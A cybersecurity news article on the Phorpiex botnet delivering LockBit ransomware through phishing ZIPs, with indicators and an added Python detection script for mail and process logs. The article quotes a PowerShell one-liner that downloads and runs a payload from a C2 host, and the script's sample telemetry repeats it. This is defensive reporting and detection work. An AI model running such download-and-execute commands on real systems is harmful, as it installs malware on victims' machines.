Phorpiex Botnet Distributes LockBit Ransomware Through Compromised Websites

Cybersecurity experts have uncovered the use of the Phorpiex botnet to distribute LockBit Black ransomware (LockBit 3.0) through millions of phishing emails and compromised websites.

This campaign, active since April 2024, marks a significant evolution in ransomware delivery methods, leveraging automation to propagate malware at an unmatched scale.

Phorpiex, also known as Trik, is a decade-old botnet notorious for its involvement in spam campaigns, cryptocurrency theft, and malware delivery.

After its source code was sold on the dark web in 2021, the botnet re-emerged with enhanced capabilities under the name “Twizt.” Operating in a peer-to-peer mode without centralized command-and-control (C2) servers, Phorpiex has proven resilient and adaptable.

TWIZT Infection Flow (Source – Cybereason)

LockBit Black, a variant of LockBit ransomware, is known for its speed and efficiency. It employs advanced encryption techniques, such as AES for file encryption and RSA for securing encryption keys.

The ransomware also incorporates double extortion tactics, exfiltrating sensitive data before encrypting systems to pressure victims into paying ransoms.

Besides this, researchers at Cybereason noted that the attack begins with phishing emails containing ZIP attachments.

Attack Chain

The phishing emails often use aliases like “Jenny Brown” or “Jenny Green” and subject lines such as “Your document” or “Photo of you???”.

Upon opening the ZIP file, victims execute a malicious binary (like .doc.scr or .exe), which connects to the Phorpiex infrastructure to download the LockBit payload.

Phorpiex to LockBit Execution FlowChart (Source – Cybereason)

The technical steps of the chain are listed below:-

  1. Downloader Execution: The malicious executable downloads LockBit from C2 servers (e.g., 193.233.132[.]177).
  2. File Encryption: LockBit encrypts files locally and on network drives using AES encryption.
  3. Persistence Mechanisms: The downloader modifies registry keys and creates mutexes to ensure persistence.
  4. Anti-Detection Techniques: Phorpiex deletes Zone.Identifier files to erase download traces and employs obfuscation to evade analysis.

Code Snippet (Downloader Execution):-

%windir%\System32\cmd.exe /c powershell.exe -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://phorpiex[.]net/payload.exe','%userprofile%\tempfile.exe');Start-Process '%userprofile%\tempfile.exe'
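The lure characteristics described under "Attack Chain" (sender aliases, subject lines, a ZIP carrying a double-extension executable) and the downloader command line above give a defender two places to look: mail-gateway data and process-creation telemetry. The following script is an added example, not code from the article or from Cybereason; it scores constructed sample events against the indicators the article names (the sender aliases, the subject lines, the C2 address 193.233.132[.]177 and the phorpiex[.]net host) plus the cmd.exe → powershell.exe / -ExecutionPolicy Bypass / WebClient.DownloadFile / Start-Process pattern of the snippet. The event field names and the sample telemetry are assumptions made for the example; the matching is a heuristic to be tuned against real logs, not a complete detection.

```python
"""
Heuristic detection for the Phorpiex -> LockBit delivery chain described in
the article. Added example: not the article's or Cybereason's own code.
All sample events below are constructed, not real captures.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Indicators quoted in the article (defanged there with "[.]").
LURE_SENDERS = {"jenny brown", "jenny green"}
LURE_SUBJECTS = {"your document", "photo of you???"}
KNOWN_C2 = {"193.233.132[.]177", "phorpiex[.]net"}

DOC_EXTS = r"(?:doc|docx|pdf|jpe?g|png|txt)"
EXE_EXTS = r"(?:scr|exe|com|pif|bat|cmd)"
# "photo.jpg.scr": document-looking name ending in an executable extension
DOUBLE_EXT_RE = re.compile(rf"\.{DOC_EXTS}\.{EXE_EXTS}$", re.I)
EXEC_EXT_RE = re.compile(rf"\.{EXE_EXTS}$", re.I)


def refang(s: str) -> str:
    """Turn '[.]' into '.' so article IoCs compare equal to raw log text."""
    return s.replace("[.]", ".")


C2_SET = {refang(x) for x in KNOWN_C2}


@dataclass
class EmailEvent:            # shape of a mail-gateway record (assumed)
    sender_name: str
    subject: str
    zip_contents: List[str]  # file names inside the attached ZIP


@dataclass
class ProcessEvent:          # shape of a process-creation record (assumed)
    parent_image: str
    image: str
    command_line: str


def score_email(ev: EmailEvent) -> List[str]:
    """Return the reasons an email looks like the campaign's lure."""
    reasons = []
    if ev.sender_name.strip().lower() in LURE_SENDERS:
        reasons.append("sender alias matches campaign lure")
    if ev.subject.strip().lower() in LURE_SUBJECTS:
        reasons.append("subject matches campaign lure")
    for name in ev.zip_contents:
        if DOUBLE_EXT_RE.search(name):
            reasons.append(f"double-extension executable in ZIP: {name}")
        elif EXEC_EXT_RE.search(name):
            reasons.append(f"executable in ZIP: {name}")
    return reasons


def score_process(ev: ProcessEvent) -> List[str]:
    """Return the reasons a process launch resembles the downloader step."""
    reasons = []
    cl = refang(ev.command_line).lower()
    parent, image = ev.parent_image.lower(), ev.image.lower()
    if parent.endswith("cmd.exe") and image.endswith("powershell.exe"):
        if "-executionpolicy bypass" in cl or "-ep bypass" in cl:
            reasons.append("powershell from cmd with ExecutionPolicy Bypass")
        if "webclient" in cl and "downloadfile(" in cl:
            reasons.append("WebClient.DownloadFile in command line")
        if "start-process" in cl:
            reasons.append("Start-Process of a just-downloaded file")
    for ioc in C2_SET:
        if ioc in cl:
            reasons.append(f"known C2 indicator: {ioc}")
    return reasons


# Constructed sample telemetry shaped after the article's description.
SAMPLE_EMAILS = [
    EmailEvent("Jenny Green", "Photo of you???", ["photo.jpg.scr"]),
    EmailEvent("Jenny Brown", "Your document", ["document.doc.scr"]),
    EmailEvent("Payroll", "Q3 timesheets", ["timesheets.xlsx"]),
]
SAMPLE_PROCESSES = [
    ProcessEvent(
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -ExecutionPolicy Bypass (New-Object System.Net.WebClient)"
        ".DownloadFile('http://phorpiex[.]net/payload.exe','C:\\Users\\u\\tempfile.exe');"
        "Start-Process 'C:\\Users\\u\\tempfile.exe'",
    ),
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -NoProfile Get-Process",
    ),
]


def run_samples() -> Dict[str, List[str]]:
    """Score every sample event; return {event_id: reasons} for flagged ones."""
    flagged: Dict[str, List[str]] = {}
    for i, ev in enumerate(SAMPLE_EMAILS):
        if reasons := score_email(ev):
            flagged[f"email{i}"] = reasons
    for i, ev in enumerate(SAMPLE_PROCESSES):
        if reasons := score_process(ev):
            flagged[f"proc{i}"] = reasons
    return flagged


if __name__ == "__main__":
    for event_id, reasons in run_samples().items():
        print(event_id, "->", "; ".join(reasons))
```

The sender and subject matches are the most brittle part (the article notes these are merely frequent aliases), so in practice the double-extension check and the cmd → powershell download-and-run pattern carry the weight; the C2 match is useful for retrospective hunting but will age quickly.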

This campaign has targeted organizations across multiple sectors, including healthcare, finance, manufacturing, and critical infrastructure.

The attackers exploit over 1,500 unique IP addresses globally, with significant activity traced to regions like Kazakhstan, Russia, and China.

To defend against such threats, organizations should implement advanced email filtering solutions to block phishing attempts and deploy anti-ransomware tools with behavioral analysis capabilities for endpoint protection.

Regular cybersecurity awareness programs help educate users, while maintaining offline backups of critical data ensures recovery in case of an attack.

By combining automation with advanced payloads like LockBit 3.0, attackers are amplifying their reach and impact. Organizations must adopt proactive security measures to mitigate risks posed by such large-scale campaigns.


The post Phorpiex Botnet Distributes LockBit Ransomware Through Compromised Websites appeared first on Cyber Security News.